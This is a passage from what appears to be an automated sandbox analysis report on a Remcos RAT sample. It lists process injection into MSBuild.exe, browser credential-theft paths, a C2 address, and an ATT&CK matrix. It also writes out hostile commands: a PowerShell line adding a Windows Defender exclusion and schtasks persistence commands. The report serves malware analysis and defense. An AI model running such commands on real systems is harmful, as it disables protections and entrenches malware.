              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044E92E GetProcessHeap,12_2_0044E92E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"Jump to behavior
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9D3008Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 10A5008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_004470AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,12_2_004510BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,12_2_004512EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,12_2_00447597
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,12_2_0040E679
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_00450CF7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_00450D42
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_00450DDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00434010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041A7A2 GetUserNameW,12_2_0041A7A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db12_2_0040B335

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-T6WK9EJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-T6WK9EJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe12_2_00405042

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		11
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		1
              Windows Service              		1
              Bypass User Account Control              		1
              Deobfuscate/Decode Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		22
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Access Token Manipulation              		3
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution              		Login Hook1
              Windows Service              		12
              Software Packing              		NTDS3
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script321
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets33
              System Information Discovery              		SSHKeylogging11
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job              		1
              Bypass User Account Control              		Cached Domain Credentials121
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync31
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion              		Proc Filesystem2
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron321
              Process Injection              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576998 Sample: file.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 12 other signatures 2->49 7 file.exe 7 2->7         started        11 DcBNSgyxoJFip.exe 5 2->11         started        process3 file4 33 C:\Users\user\AppData\...\DcBNSgyxoJFip.exe, PE32 7->33 dropped 35 C:\...\DcBNSgyxoJFip.exe:Zone.Identifier, ASCII 7->35 dropped 37 C:\Users\user\AppData\Local\...\tmp1B5F.tmp, XML 7->37 dropped 39 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->39 dropped 51 Uses schtasks.exe or at.exe to add and modify task schedules 7->51 53 Writes to foreign memory regions 7->53 55 Allocates memory in foreign processes 7->55 63 2 other signatures 7->63 13 MSBuild.exe 3 7->13         started        17 powershell.exe 23 7->17         started        19 schtasks.exe 1 7->19         started        57 Antivirus detection for dropped file 11->57 59 Multi AV Scanner detection for dropped file 11->59 61 Machine Learning detection for dropped file 11->61 21 MSBuild.exe 11->21         started        23 schtasks.exe 1 11->23         started        signatures5 process6 dnsIp7 41 107.173.4.16, 2560, 49711, 49713 AS-COLOCROSSINGUS United States 13->41 65 Contains functionality to bypass UAC (CMSTPLUA) 13->65 67 Detected Remcos RAT 13->67 69 Contains functionalty to change the wallpaper 13->69 73 4 other signatures 13->73 71 Loading BitLocker PowerShell Module 17->71 25 WmiPrvSE.exe 17->25         started        27 conhost.exe 17->27         started        29 conhost.exe 19->29         started        31 conhost.exe 23->31         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

